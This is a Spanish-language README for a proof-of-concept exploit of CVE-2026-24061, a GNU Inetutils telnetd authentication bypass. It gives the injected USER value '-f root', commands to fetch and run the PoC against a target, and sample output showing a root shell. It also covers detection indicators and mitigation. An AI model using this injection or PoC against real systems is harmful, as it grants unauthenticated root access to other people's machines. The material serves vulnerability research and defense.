
CVE-2026-24061 Omisión de autenticación en Telnetd de GNU Inetutils
CVE: CVE-2026-24061
Severidad: Crítica
CVSS: 9.8 (Crítica)
CWE: CWE-88 — Neutralización Incorrecta de Delimitadores de Argumentos en un Comando
Componente Afectado: telnetd de GNU Inetutils
Versiones Afectadas: 1.9.3 hasta 2.7
CVE-2026-24061 es una vulnerabilidad crítica de bypass de autenticación en la implementación del servidor Telnet proporcionada por GNU Inetutils. La vulnerabilidad se origina por una validación insuficiente de la variable de entorno USER controlada por el cliente cuando el inicio de sesión automático de Telnet está habilitado. Un valor malicioso puede interpretarse como una opción para el programa de inicio de sesión del sistema en lugar de como un nombre de usuario. Bajo configuraciones vulnerables, un atacante remoto no autenticado puede abusar de este comportamiento para invocar login con la opción -f y eludir la autenticación, obteniendo potencialmente un shell con los privilegios de la cuenta solicitada.
Cuando el servicio Telnet afectado se ejecuta con privilegios de root, la explotación exitosa puede resultar en acceso remoto root no autenticado.
El flujo de ejecución vulnerable se puede resumir como:
Cliente Telnet
│
│ USER=-f root
▼
telnetd
│
│ construye argumentos de login
▼
login -f root
│
│ bypass de autenticación
▼
shell root
El problema se desencadena mediante la interacción entre la funcionalidad de inicio de sesión automático de Telnet y el manejo de la variable de entorno USER.
El valor controlado por el atacante:
-f root
no se trata estrictamente como un nombre de usuario. En su lugar, puede convertirse en un argumento para login, resultando en un comportamiento equivalente a:
login -f root
La opción -f indica a login que omita el proceso de autenticación normal para el usuario especificado.
El repositorio incluye una prueba de concepto en Python 3 que realiza la conexión Telnet, maneja la negociación de protocolo requerida, inyecta el valor USER malicioso y verifica la sesión resultante.
git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
cd CVE-2026-24061-Telnetd
chmod +x poc.py
python3 poc.py <TARGET> <PORT>
wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py
Haga ejecutable el PoC:
chmod +x poc.py
Ejecútelo proporcionando la dirección del objetivo y el puerto Telnet:
python3 poc.py <TARGET> <PORT>
python3 poc.py 127.0.0.1 23
Explotación Exitosa
CVE-2026-24061 - Bypass de Auth en telnetd de GNU Inetutils
[*] Objetivo: 127.0.0.1:23
[+] Conectado
[*] USER=-f root inyectado
[+] VULNERABLE
El PoC proporciona entonces una sesión interactiva.
id
uid=0(root) gid=0(root) groups=0(root)
Esto confirma que el mecanismo de autenticación de Telnet fue eludido y la sesión resultante tiene privilegios de root.
El exploit realiza las siguientes operaciones:
Se conecta al servicio Telnet objetivo. Realiza la negociación de protocolo Telnet requerida. Habilita el comportamiento de inicio de sesión automático necesario para la explotación. Suministra el valor malicioso USER=-f root. Permite que la implementación vulnerable de telnetd pase el valor manipulado a login. Recibe la sesión resultante. Proporciona una terminal interactiva al operador.
El PoC no depende de credenciales para la ruta de autenticación vulnerable.
La explotación depende de la configuración del objetivo y de la interacción entre telnetd y la implementación de login del sistema.
Las condiciones principales son:
telnetd de GNU Inetutils dentro del rango de versiones afectadas.
Servicio Telnet accesible para el atacante.
Funcionalidad de inicio de sesión automático habilitada o disponible.
Manejo vulnerable de la variable de entorno USER.
Una implementación de login compatible capaz de interpretar la opción inyectada.
En consecuencia, la presencia de una versión afectada de Inetutils por sí sola no debe tratarse como prueba de explotabilidad. Los parches de distribución y la configuración del servicio también deben considerarse.
CVE-2026-24061 puede comprometer completamente un sistema vulnerable.
Dependiendo de los privilegios bajo los cuales opera telnetd, la explotación puede proporcionar:
Bypass de autenticación
Acceso no autorizado a cuentas locales
Ejecución remota de comandos
Escalada de privilegios
Acceso a nivel de root
Compromiso total del sistema
El escenario de mayor riesgo es un servicio Telnet accesible remotamente donde la explotación resulta en una sesión root.
Los indicadores potenciales de explotación incluyen:
Conexiones inesperadas a TCP/23.
Intentos de autenticación Telnet usando nombres de usuario inusuales.
Valores USER sospechosos que comienzan con opciones de línea de comandos.
Argumentos inesperados del proceso login.
Sesiones root originadas desde telnetd.
Procesos inesperados generados por el servicio Telnet.
El monitoreo de red también debe identificar sistemas que exponen servicios Telnet innecesariamente.
La respuesta recomendada es eliminar Telnet y usar SSH para la administración remota.
Si Telnet no puede eliminarse de inmediato:
Actualice a una versión proporcionada por el proveedor que contenga la corrección de seguridad.
Aplique la actualización de seguridad apropiada del sistema operativo.
Restrinja TCP/23 a redes de gestión confiables.
Evite la exposición directa de Telnet a redes no confiables.
Monitoree la autenticación Telnet y la actividad de procesos.
Debido a que las distribuciones de Linux pueden aplicar parches de seguridad sin cambiar el número de versión ascendente, los administradores deben verificar el estado de seguridad de su paquete de distribución en lugar de confiar únicamente en la versión mostrada.
La vulnerabilidad se reprodujo exitosamente contra un servicio Telnet vulnerable de GNU Inetutils ejecutándose en Ubuntu 22.04.5 LTS.
El PoC estableció una conexión a TCP/23, inyectó:
USER=-f root
y obtuvo una sesión root.
La verificación de privilegios devolvió:
uid=0(root) gid=0(root) groups=0(root)
Esto proporciona confirmación directa del impacto de seguridad.
Esta prueba de concepto se proporciona con fines de investigación de seguridad, validación de vulnerabilidades, pruebas de penetración autorizadas y fines educativos.
Solo pruebe sistemas para los cuales tenga autorización explícita.
Gabriel D. Ishengoma
Seguridad Ofensiva · Investigación en Ciberseguridad · Informática Forense Digital